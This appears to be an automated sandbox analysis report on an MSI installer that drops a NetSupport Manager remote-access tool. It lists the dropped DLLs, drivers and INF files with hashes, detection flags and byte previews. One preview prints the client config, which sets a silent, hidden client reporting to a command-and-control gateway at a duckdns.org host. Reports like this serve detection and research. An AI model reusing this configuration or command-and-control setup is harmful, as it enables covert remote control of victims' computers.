                                                                                      SHA-512:8B7507AD5E91377FC50673C649B8FA26245504AF53200AFBE56130B67C05318E707CC642FF0A54771DEFD5AC87252684AB5245099C7CE2AA81F0C52B55A48D7D
                                                                                      Malicious:false
                                                                                      Preview:0xf10b75ab....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..UsernamesU=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..PasswordU=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gskmode=0..GSKU=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\concrt140.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):250160
                                                                                      Entropy (8bit):6.6978319974134735
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:7tOrNG33aoeoMgFrxCCTZkogkArqfmUQr3fGkfJFCIZJ12z/bRbH:7tOrO3Ksko5Arq23AIZKzx
                                                                                      MD5:E5F65F0775313A0C23B3C61916C2C3EF
                                                                                      SHA1:CF84F9C9DF08D389C07C3E51EFDF7714D188BDFE
                                                                                      SHA-256:AF557540224984F759068120590A8178AB50406BCAE8812351B56B274BC6D4F5
                                                                                      SHA-512:15F9B9AEB40622EE9D6AD19CA17B1F1A1666BF8F33DC9A604E22F7550F4CA9BC7B0DD2AA6AF24E6EF534CCAC007E923C6CFF2507F7357489F5ADCA369D782B06
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~e.............b........g.......y..........P....y.......y.......y.......y.......y.......y.......y......Rich....................PE..L......Z.........."!.........x...............0....................................... ....@A.............................K..(b..........................0?......./...;..8............................;..@............`..$............................text...<........................... ..`.data........0...,..................@....idata.......`.......J..............@..@.rsrc................\..............@..@.reloc.../.......0...b..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\gdihook5.INF

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):2381
                                                                                      Entropy (8bit):5.374632099663492
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:E4hfow3Kqy0nxNrwN1XQmeFh+5XXdJpBsK38pwlFTP/Fs0cv:EBwG0xNrwN+qD3MpwlFL2tv
                                                                                      MD5:703C7774B981E5D02E058340A27A5B75
                                                                                      SHA1:37534D7F0B31D2328D70CA578047D597273B73B6
                                                                                      SHA-256:4CFCA868959F4E1B85BFD6B8A970AE06C0810D9C341F260DF3AB8479089500E9
                                                                                      SHA-512:758E84915FA7EBB343BAFD096BC40D9D226FE0DA7C167B2B8E59F664E1BE796143228BC3405DF7E3447CDC918004DB516344365D3D07A8E6C040DF2B90456D78
                                                                                      Malicious:false
                                                                                      Preview:; gdihook5.inf..; Installation inf for the gdihook5 mirror driver...; copyright (c) 2011 NetSupport Ltd....[Version]..Signature="$WINDOWS NT$"..Provider=%PCI%..ClassGUID={4D36E968-E325-11CE-BFC1-08002BE10318}..Class=Display..DriverVer=08/14/2011,11.11.0.704..CatalogFile=gdihook5.cat....[DestinationDirs]..DefaultDestDir = 11..gdihook5.Miniport = 12 ; drivers..gdihook5.Display = 11 ; system32....;..; Driver information..;....[Manufacturer]..%PCI% = gdihook5.Mfg, NTx86, NTamd64....[gdihook5.Mfg.NTx86]..%gdihook5.DeviceDesc0% = gdihook5, pci_gdihook5_hwid....[gdihook5.Mfg.NTamd64]..%gdihook5.DeviceDesc0% = gdihook5, pci_gdihook5_hwid....;..; General installation section..;....[gdihook5]..FeatureScore=FC..CopyFiles=gdihook5.Miniport, gdihook5.Display....;..; File sections..;....[gdihook5.Miniport]..gdihook5.sys....[gdihook5.Display]..gdihook5.dll......;..; Service Installation..;....[gdihook5.Services]..AddService = gdihook5, 0x00000002, gdihook5_Service_Inst....[gdihook5_Service_Inst]

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\gdihook5.cat

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8991
                                                                                      Entropy (8bit):6.951682034433646
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:iEd0VE3v3k08ywwlhjeyveCtAW5LfsxhQ8eVC:iDwPjpvjAGLa3x
                                                                                      MD5:2D31CE5FE7CD81C996615EBCC29C058A
                                                                                      SHA1:4D74FE8E3170D36666DF779E43FE8016986B154A
                                                                                      SHA-256:019290C9B7E5B48FB6DE95F9563ED481CD42F8658451C6FBC8AD131D61209CE0
                                                                                      SHA-512:B8188481050630E7317D2F0687790A46E86F30A79F34164E4B02EC28DA39334DA80BD494A4F32AE8BB60FA2F01273CDCD9D15100F901517B0C01507678330052
                                                                                      Malicious:false
                                                                                      Preview:0.#...*.H........#.0.#....1.0...+......0.....+.....7......0...0...+.....7......8.k.&.L.(|{%.....110823130027Z0...+.....7.....0...0....R3.7.5.3.4.D.7.F.0.B.3.1.D.2.3.2.8.D.7.0.C.A.5.7.8.0.4.7.D.5.9.7.2.7.3.B.7.3.B.6...1.._0<..+.....7...1.0,...F.i.l.e........g.d.i.h.o.o.k.5...i.n.f...0X..+.....7...1J0H...O.S.A.t.t.r.......22.:.5...0.0.,.2.:.5...1.,.2.:.5...2.,.2.:.6...1...0a..+.....7...1S0Q0,..+.....7........<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+........7SM..1.2.p.W.G.';s.0b..+.....7...1T0R.L.{.D.E.3.5.1.A.4.2.-.8.E.5.9.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0....R4.3.B.5.4.2.0.5.8.2.1.8.D.7.F.0.D.5.2.3.9.3.F.3.2.9.4.E.7.7.9.0.F.A.8.E.8.C.1.3...1..g0<..+.....7...1.0,...F.i.l.e........g.d.i.h.o.o.k.5...s.y.s...0X..+.....7...1J0H...O.S.A.t.t.r.......22.:.5...0.0.,.2.:.5...1.,.2.:.5...2.,.2.:.6...1...0b..+.....7...1T0R.L.{.C.6.8.9.A.A.B.8.-.8.E.7.8.-.1.1.D.0.-.8.C.4.7.-.0.0.C.0.4.F.C.2.9.5.E.E.}....0i..+.....7...1[0Y04..+.....7...0&..... .....<.<.<.O.b.s.o.l.e.t.e.>.>.>0!0...+.....

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):59872
                                                                                      Entropy (8bit):6.890148857867
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:YKLLK1jLIrJUw9Dyehz6mnTEDtGCd3FN+r2pe/q3HDHf/ckBr2pe/NyHDHf/ckt:YKLLKS9Dvhu5NOee/ajHxee/UjHR
                                                                                      MD5:7AC62F00194B01935EA6A35CF8884912
                                                                                      SHA1:7A04936B6C234AA924AD3293188A39B3CC49AD3A
                                                                                      SHA-256:5B87FAFB20833B4803F829C6816235048566579F6C72EF44B6FDE1F54195384F
                                                                                      SHA-512:86A98BF85142DFF3F6643B964579D2AC2438BE9A3D644E2C0E1BD3FF055C0CE17ACFC689503AB0A9AFB4E495B406592597F613F47C12E8E2413F6AA89E0B5FD7
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\injlib.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:-.~L..~L..~L...:".vL...:..FL..w4/.}L..~L..6L...:..uL...:'..L...:&..L...:!..L..Rich~L..........................PE..L.....oe...........!.....J...>...............`.......................................e....@.............................]....z..(.......(................]...........................................x..@............`...............................text....I.......J.................. ..`.rdata..m!...`..."...N..............@..@.data................p..............@....rsrc...(............|..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\libcrypto-1_1.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2578344
                                                                                      Entropy (8bit):6.251948534749446
                                                                                      Encrypted:false
                                                                                      SSDEEP:49152:4X0hD1wHH5cvdcSvrIq8hJ1CPwDv3uFh+OfXXU:4X0hD1w21csIq831CPwDv3uFh+j
                                                                                      MD5:8A04281ABC13FE1D4C8587AE9D177C42
                                                                                      SHA1:72C2FCB96404C32C8BD8D1B2752B0B24CE9AB539
                                                                                      SHA-256:DD697C680C7296FE84F8761C54D7DAEED41222E86D409A4751F5A53B16A82B0B
                                                                                      SHA-512:DD13813A32C1561115C1B61B50F56B560A1C2BF27F061A9E7B328937DC896150B4C31AC57BFEA475DA8ED08996F708C8724B9D50FC2DC2D59EAF25CACE32D112
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..pw.@#w.@#w.@#~..#c.@#d.A"u.@#d.C"}.@#d.E"}.@#d.D"}.@#..A"z.@#w.A#.@#w.@#`.@#I.D"..@#I.@"v.@#I.#v.@#I.B"v.@#Richw.@#........PE..L...0*._...........!................E........................................p'.......'...@.........................`g#.hg...6&.h....`&.|.............&..]...p&..... K#.8...........................XK#.@............0&..............................text............................... ..`.rdata..............................@..@.data...8\....%.......%.............@....idata..R....0&.......%.............@..@.00cfg.......P&.......%.............@..@.rsrc...|....`&.......%.............@..@.reloc..q....p&.......&.............@..B........................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\libssl-1_1.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):555944
                                                                                      Entropy (8bit):5.860497620903766
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:aVM2qk4ikDJj2hZuF/fpGzBqGPeck8p22gU2lvzaP1r4:X2q7ikLXg+c7wU2lvzaPi
                                                                                      MD5:D559D1B694B817E3E3E15200AF4603F6
                                                                                      SHA1:4D486E5D8171973C17E61ACA47FC97A71BC9EB7E
                                                                                      SHA-256:407C28909CEA2ADC3B2B2A1F89132A543F57EFF9D96CDAA5DEEF5109CB2CA770
                                                                                      SHA-512:6480B2F66558BDB5D0243E66AECD4E9B347BC5A67B829AE1980043AC487290B8CF04C43F3294E4160B5CA4F604D1C17000458EEBF759A530C5B79E2A952A72BB
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l.S.l.S.l.S..ZS.l.S...R.l.S...R.l.S...R.l.S...R.l.S...R.l.S...R.l.S.l.S<m.S...R.l.S...R.l.S..6S.l.S...R.l.SRich.l.S................PE..L...1*._...........!.........................................................p............@......................... )...N........... ..s................]...0...5......8...............................@............................................text............................... ..`.rdata..*g.......h..................@..@.data....;.......6...^..............@....idata..3A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..;=...0...>..................@..B................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\logo.png

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PNG image data, 300 x 77, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):6843
                                                                                      Entropy (8bit):7.939767423234445
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:YSH/KoQ1X5F8VX3JNHimWaMp3Lu0FEkxpGAlNjGJHpLgwDy+eFyb:fyl/aVXK7u09JNoJ0wDy+C+
                                                                                      MD5:9A9827C570F102CA3366E549A047B99A
                                                                                      SHA1:682C7A3612B300B1F3D0B5E0BE557ED148003DE0
                                                                                      SHA-256:F1F79307A3352EFB6CE296EED242F368C4724144B7B2F624C1B4223C7952A2C9
                                                                                      SHA-512:8BBFA11F841276A07E29E8D042FD4436C569BA984A56F6EB45D9D73A65BE7EBFECF8D8BC81D122FCF9DE4814A41EF38E7150EFAA8D06C0BE0145B74712D5E834
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR...,...M.......Y>....pHYs................mIDATx..y.....3,..*..PA#....zB..hPc.Dc\.1...3ZV.K.hb.b..[.w.[.ZZ."..D..E.e.m...qn;55.=..3.=s....tU.u.....{NYuu5...R.....,....X.e.XJ.+.,.K.`...b)....X,%..X...d...b...V`Y,....,..R2X.e.XJ.+.,.K..>.....%.a.4.'...e...w..x6.mu.pY..g..R^.....R^..cb.2...M..#....s.......8At3p..1.=`..O..m.q..R^/.Wb.....>.u.7.^V.~.b..K......Q.>(..".|....&w....:....W..\.u.D.\.6.....;M.ocy...y?..............P.hz...?.....N.m.....[.<..Qo.......`........w.7..q..'...s..Y..o.C.ZX..Y.u t...b.&e..f...8.....R.D....Jy."l....NA....E.W..E....}w5P.<...N............^....q....v....1e.#s.hX.....C..~.u...UB(...<.l..c...3...u.........c..kvp...p0..D..[........;...._.~..7q"_~.e3..8...\.....w.....5...Zj..j...y..&)...xCk{....D;.?...c.[...eN.]...<.t..O@o`..D..f..}.....;.h.".x.......F...|.. (D`...^W...u.ns.(.R^9...#b..oj....L.:..hP...y...H..\)..........#....#.._.gl.B)..`s..T..".:...e.].pu..=...v@w.O.V#.....B.h.{....._:.s...g.\.

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):4397384
                                                                                      Entropy (8bit):7.044443988235452
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:WEWsrhmswShHpSvnB5MnhpTnWbWA7ySeAfCt0PfI9jWwg76YAvvU+uFLOAkGkzdz:W6DWbLRojDbvU+uFLOyomFHKnPA25
                                                                                      MD5:493FC0F59054A6F4F3775655FB55295C
                                                                                      SHA1:2AFE4F5EB626FB5C5AA5BB6C2BC61C88E37CF42F
                                                                                      SHA-256:CAC58C98F7E587BA1B2A4F41874764B59BDF6CB684A4A44AEE93F91B3B9A019B
                                                                                      SHA-512:9DA41078A65A6B8C731388CCF4CE2A988705305F29F0841039B96CD2649F82E8EA219F082DE184826E39F0EDAA4A1D9AFF2E60EBB8D27771222D0C7CB165598D
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._.1...1...1.......1.......1.......1.'....1.......1.......1.......1.......1...0.H.1.....(.1.......1.......1.......1.Rich..1.................PE..L......M.........."!......*..d......%.%.......+....x..........................C......|C...@...........................*.....<.).......,.H.............C.H.....@....../..................................@...............8.....)......................text.....*.......*................. ..`.data.........+.......*.............@....rsrc...H.....,.......+.............@..@.reloc...a....@..b....?.............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc100u.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):4422992
                                                                                      Entropy (8bit):7.012472770624414
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:jsWbb5oF0MUVVsK3vOGH+1TSlUE7vrffTTnm7ulf67NACOub7FLOAkGkzdnEVomK:jx5x3Ii6F7FLOyomFHKnPA+
                                                                                      MD5:F32077DF74EFD435A1DCDF415E189DF1
                                                                                      SHA1:2771393D56FF167275BF03170377C43C28EE14E1
                                                                                      SHA-256:24BB6838DEFD491DF5460A88BED2D70B903A2156C49FB63E214E2C77251ECA71
                                                                                      SHA-512:FB708E0949854998FB80635138C80AC05D77DCA3089D3E5974663DDF2376D6A03535DAE1A068514C3B58BC06C8E4078B37CFB6BC90F080F7F31FEFC972A34850
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._.r1..r1..r1......r1......r1....r1.'<...r1....r1....r1....r1......r1..r0.^q1...(s1....r1....r1....r1.Rich.r1.................PE..L....)_M.........."!.....P+..h......I:&......`+..._x..........................C.......C...@.........................P}*.P...HE*......p,.H............fC.P.....@.....`/..............................@N..@...................<)*......................text....N+......P+................. ..`.data........`+......T+.............@....rsrc...H....p,.......,.............@..@.reloc..Fc....@..d....@.............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\mfc140u.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):5178656
                                                                                      Entropy (8bit):6.880627623004376
                                                                                      Encrypted:false
                                                                                      SSDEEP:98304:DEl4oAxkdYqhHRMg7R/dRwIc/3jYkCw055xXtQo7h6jBPgUYcupFLOAkGkzdnEVM:DlEdLhxM+/TwIc/j65x9aZgUYcaFLOyM
                                                                                      MD5:835F7A6C55D49EAE72A482D781B1EAD8
                                                                                      SHA1:CC63546F46E0BDA33EFFF2CDA121219667EB70E3
                                                                                      SHA-256:A52B83AC23739BCC8B0E89D1EFC05A199FE7CF8914D3F42C8DB5560CADB105E7
                                                                                      SHA-512:F0F0B36502AB2E3283ACD87171E0F7FE823515A4DCE7C70079AB26D3F75096E9A05EA6E0377E50ACF21B491AFE404DABFFBD0D91D6421C0B337CB3C6CE72CB24
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......T..........mJ....mL....mM.....*............................mV.....................F.........Rich..........................PE..L......Z.........."!......4.........P`.......@0...............................O.......O...@A............................L...|=5.......5...............N. ?...@K......<4.8...........................Xf..@............05.x.....4......................text....-4.......4................. ..`.data...x....@4......24.............@....idata...S...05..T....5.............@..@.didat........5......b5.............@....rsrc.........5......f5.............@..@.reloc.......@K.......J.............@..B................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp100.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):421200
                                                                                      Entropy (8bit):6.595942471932211
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:Seb8zxr1aWPaHX7dGP5frhUgiW6QR7t5qv3Ooc8UHkC2e7wx:Seb8Fpa6aHX7dGP5Gv3Ooc8UHkC2ekx
                                                                                      MD5:BC83108B18756547013ED443B8CDB31B
                                                                                      SHA1:79BCAAD3714433E01C7F153B05B781F8D7CB318D
                                                                                      SHA-256:B2AD109C15EAA92079582787B7772BA0A2F034F7D075907FF87028DF0EAEA671
                                                                                      SHA-512:6E72B2D40E47567B3E506BE474DAFA7CACD0B53CD2C2D160C3B5384F2F461FC91BB5FDB614A351F628D4E516B3BBDABC2CC6D4CB4710970146D2938A687DD011
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..d...d...d.......d.......d...d..Cd..K*...d.......d.......d.......d.......d.......d.......d.......d..Rich.d..........................PE..L...A..M.........."!.................<.............x................................(~....@.................................<...<.... ...............V..P....0..D;..p................................/..@...............p............................text...u........................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcp140.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):462120
                                                                                      Entropy (8bit):6.664460200008014
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:U3QUergtVD7jfIobCFvUk5ShUgiW6QR7t5s03Ooc8dHkC2esIj:9UXzD3IoCFvUG03Ooc8dHkC2eJj
                                                                                      MD5:11BC8B95833B52E09DAC5EC36F09C125
                                                                                      SHA1:8ED0EA8ACB742F084816261E7CD5AAB5B98E22BE
                                                                                      SHA-256:32882ABB46333874F3DD9B3648CEA6DE18D75D04863C2CD2F1BCDDBF348E3A26
                                                                                      SHA-512:0FE24A5C910CCA7FD1BDB7D5988FE8ABC210A859D42AA0234D969F0911207E50D48AF244B0A2E86E0A66A3FFE981E5F48E2DD72A8D62FD1B53FD4B9ED531658E
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.$._.w._.w._.w..2w._.w.'Nw._.w._.w._.w.9.v._.w.9.v._.w.9.v._.w.9.v._.w.9.v._.w.9.v._.w.9"w._.w.9.v._.wRich._.w........................PE..L......Z.........."!.....T..........@........p...............................0............@A...................................,.......................(?......`@...w..8............................-..@...................`...@....................text...2R.......T.................. ..`.data...T(...p.......X..............@....idata...............p..............@..@.didat..4...........................@....rsrc...............................@..@.reloc..`@.......B..................@..B........................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\msvcr100.dll

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):773968
                                                                                      Entropy (8bit):6.901559811406837
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                      MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                      SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                      SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                      SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.inf

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Windows setup INFormation
                                                                                      Category:dropped
                                                                                      Size (bytes):328
                                                                                      Entropy (8bit):4.93007757242403
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                      MD5:26E28C01461F7E65C402BDF09923D435
                                                                                      SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                      SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                      SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                      Malicious:false
                                                                                      Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):33408
                                                                                      Entropy (8bit):6.382369861010622
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:mbjTW3njbfudD/lgV1co3+iMMGi/cKnLEJFs:uW3WD/lgv+F7KnN
                                                                                      MD5:1C2143ADEAB91D77EB5A9624BD28B283
                                                                                      SHA1:5F8BB1A5A6AE56AF8BBD60ACD1C4C67CFD8E26B1
                                                                                      SHA-256:F897746F7FC866B9FC100F36D6896B883E55B08C5AE9E7D8358FCDB937C6C097
                                                                                      SHA-512:0D9A5C2130496F4EF4B06AD55BE7BA84190A36E0D8412FA11E816EF53BBAE413CB11742C053644D6F4DF44D19746DB0EA420D0426B83EB1A298D42E9E48D11A2
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr.sys, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r2..6S.W6S.W6S.W...W5S.W..'W4S.W..&W4S.W...W4S.W6S.W$S.W@..W5S.W@..W7S.W...W;S.W...W4S.W@..W7S.W...W5S.W...W7S.W...W7S.WRich6S.W........PE..d...Q.(Y.........."......J...$.......(..........................................................................................................<...............(....d..........4....P...............................................P...............................text....=.......>.................. ..h.rdata..H....P.......B..............@..H.data........`.......J..............@....pdata..(............N..............@..HPAGE....9............R.............. ..`INIT.................X.............. ....rsrc................^..............@..B.reloc...............b..............@..B........................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nskbfltr2.sys

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):34008
                                                                                      Entropy (8bit):6.39207103344199
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:QbG73Znjbfudxpl7x1u33FrFteVVJKZg0ymNjB:B3ZWxpl7KFcKZgCH
                                                                                      MD5:FE21DE1984A1DB19D520F01BADAE7087
                                                                                      SHA1:13DEE984774E0E3605B8D9E34E73F79EFDAAB1E3
                                                                                      SHA-256:E7E628DE2ED025AD146328E86FA7AB83A79962972CC847263F984EDC567D6E7C
                                                                                      SHA-512:1C79A62CB6E695A5178D8C28CACC765977981A9FA0E005126D29CB82042F175569C88D51E3003148116F9CBAD68412DC597817B2C1C9688E1EA34ACF79E56AF5
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 2%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p2..4S.W4S.W4S.W...W7S.W..'W6S.W..&W6S.W...W6S.W4S.W%S.WB..W7S.WB..W5S.W...W9S.W...W6S.WB..W5S.W...W7S.W...W5S.W...W5S.WRich4S.W........PE..d.....cT.........."......H...$.......&..............................................."..........................................................<...............(....b..."......4....P...............................................P...............................text...];.......<.................. ..h.rdata..$....P.......@..............@..H.data........`.......H..............@....pdata..(............L..............@..HPAGE.................P.............. ..`INIT.................V.............. ....rsrc................\..............@..B.reloc...............`..............@..B........................................................................................................................................................

                                                                                      C:\Program Files (x86)\NetSupport\NetSupport Manager\nsm32.chm

                                                                                      Download File
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:MS Windows HtmlHelp Data
                                                                                      Category:dropped
                                                                                      Size (bytes):1205074
